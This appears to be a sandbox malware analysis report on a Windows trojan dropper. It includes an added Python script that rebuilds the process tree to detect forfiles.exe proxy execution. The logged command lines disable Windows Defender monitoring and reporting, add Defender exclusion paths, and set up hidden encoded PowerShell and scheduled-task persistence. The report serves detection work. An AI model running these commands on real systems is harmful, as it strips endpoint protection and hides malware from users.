Malware Analysis Report

2025-08-10 23:15

Sample ID 221031-1zgzjaedek
Target file.exe
SHA256 7c74576432c1d96de5ab6f00f0027b2e4565743dc1362423e5370a5fc56ee191
Tags
evasion trojan discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7c74576432c1d96de5ab6f00f0027b2e4565743dc1362423e5370a5fc56ee191

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

evasion trojan discovery spyware stealer

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Checks BIOS information in registry

Loads dropped DLL

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-10-31 22:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:07

Platform

win7-20220901-en

Max time kernel

150s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Count Description Indicator Process Target
2 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
2 Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Count Description Indicator Process Target
9 Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
8 Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YVKeAuHUOaLCRzVB = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nolBHjueEzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XYDCXZXPsTrrC = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dVbwgRbTSJJLORWiduR = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yOvDRBMJNKKU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SvbbHukzU = "0" C:\Windows\SysWOW64\reg.exe N/A
1 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A
2 Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\grMXAHIUMHIHAuvw = "0" C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A

Drops file in System32 directory

Count Description Indicator Process Target
1 File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A
3 File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
1 File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe N/A
1 File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe N/A
1 File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Count Description Indicator Process Target
4 N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A

Suspicious use of AdjustPrivilegeToken

Count Description Indicator Process Target
3 Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Count Description Indicator Process Target
7 PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
7 PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
7 PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
7 PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
7 PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
7 PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
7 PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
7 PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
7 PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
1 PID 1440 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
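
The WriteProcessMemory rows are the one place in this report where the launch chain is visible end to end: the sandbox logs one row per write into the new child process, so every parent-child edge shows up several times, but read as edges the rows give file.exe (1380) -> 7zS166E.tmp\Install.exe (824) -> 7zS254D.tmp\Install.exe (936) -> forfiles.exe (2028, 1328) -> cmd.exe (1376, 1440) -> reg.exe (288, 1580, 960, 592). The forfiles.exe hop is the detection-relevant detail. forfiles /p c:\windows\system32 /m cmd.exe /c "..." runs the /c command once for each file that matches cmd.exe, so cmd.exe and reg.exe become children of a signed Windows utility rather than of the installer, and a rule that only looks for Install.exe spawning reg.exe never fires. The script below is an added example, not part of the sandbox report. It parses a constructed, abridged copy of these rows, collapses the repeated writes into a per-edge count, rebuilds the process tree and flags every leaf reached through forfiles.exe -> cmd.exe -> reg.exe.

```python
import re
from collections import Counter

# Constructed sample: an abridged copy of the "Suspicious use of WriteProcessMemory"
# rows from this report. The sandbox logs one row per write, so the first edge is
# deliberately left repeated to give the collapsing step something to collapse.
WPM_ROWS = r"""
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 1380 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe
PID 824 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe
PID 936 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 936 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1328 wrote to memory of 1440 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 1376 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1440 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1376 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1440 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
"""

# The second image path starts with a drive letter or the \??\ NT prefix, which is
# how the two space-separated paths at the end of a row are told apart.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_img>.+?) (?P<dst_img>(?:\\\?\?\\|[A-Za-z]:\\).*)$"
)


def parse_rows(text):
    """Return (edges, images): edges counts writes per (parent_pid, child_pid),
    images maps every pid seen to its image path."""
    edges = Counter()
    images = {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # not a WriteProcessMemory row
        src, dst = int(m["src"]), int(m["dst"])
        edges[(src, dst)] += 1
        images.setdefault(src, m["src_img"])
        images.setdefault(dst, m["dst_img"])
    return edges, images


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def children_of(edges):
    kids = {}
    for parent, child in edges:
        kids.setdefault(parent, []).append(child)
    return kids


def roots(edges):
    """Pids that wrote to others but were never written to: the original launcher."""
    return sorted({p for p, _ in edges} - {c for _, c in edges})


def ancestry(edges, images, pid):
    """Image basenames from the root down to pid."""
    parent_of = {}
    for parent, child in edges:
        parent_of.setdefault(child, parent)
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return [basename(images[p]) for p in reversed(chain)]


PROXY_CHAIN = ("forfiles.exe", "cmd.exe", "reg.exe")


def proxy_execution_chains(edges, images):
    """Leaf processes reached through forfiles.exe -> cmd.exe -> reg.exe."""
    kids = children_of(edges)
    hits = []
    for pid in images:
        if pid in kids:
            continue  # has children, so not a leaf
        anc = ancestry(edges, images, pid)
        if tuple(anc[-3:]) == PROXY_CHAIN:
            hits.append((pid, anc))
    return sorted(hits)


def render(edges, images):
    """Indented process tree with the collapsed write count on each child."""
    kids = children_of(edges)
    lines = []

    def walk(pid, depth, n_writes):
        tag = f"  [{n_writes} writes]" if n_writes > 1 else ""
        lines.append("  " * depth + f"{basename(images[pid])} (pid {pid}){tag}")
        for child in kids.get(pid, []):
            walk(child, depth + 1, edges[(pid, child)])

    for root in roots(edges):
        walk(root, 0, 1)
    return "\n".join(lines)


if __name__ == "__main__":
    edges, images = parse_rows(WPM_ROWS)
    print(render(edges, images))
    for pid, chain in proxy_execution_chains(edges, images):
        print(f"proxy-execution chain to pid {pid}: " + " -> ".join(chain))
```

The same walk works on any sandbox or EDR process-creation export once the parser is swapped for that format; the point is to key the rule on the three-image suffix of the ancestry rather than on the immediate parent, which forfiles.exe was inserted to break.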

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEhzvxrPb" /SC once /ST 09:41:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEhzvxrPb"

C:\Windows\system32\taskeng.exe

taskeng.exe {9A6228B2-40B6-4D89-A88A-102951D5FBBE} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEhzvxrPb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 22:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe\" KP /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {1B3DA9EC-DE32-43E4-AFF8-296227E6196C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gLdoXkBXq" /SC once /ST 17:46:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gLdoXkBXq"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gLdoXkBXq"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPZLeWFxT" /SC once /ST 01:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPZLeWFxT"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPZLeWFxT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32

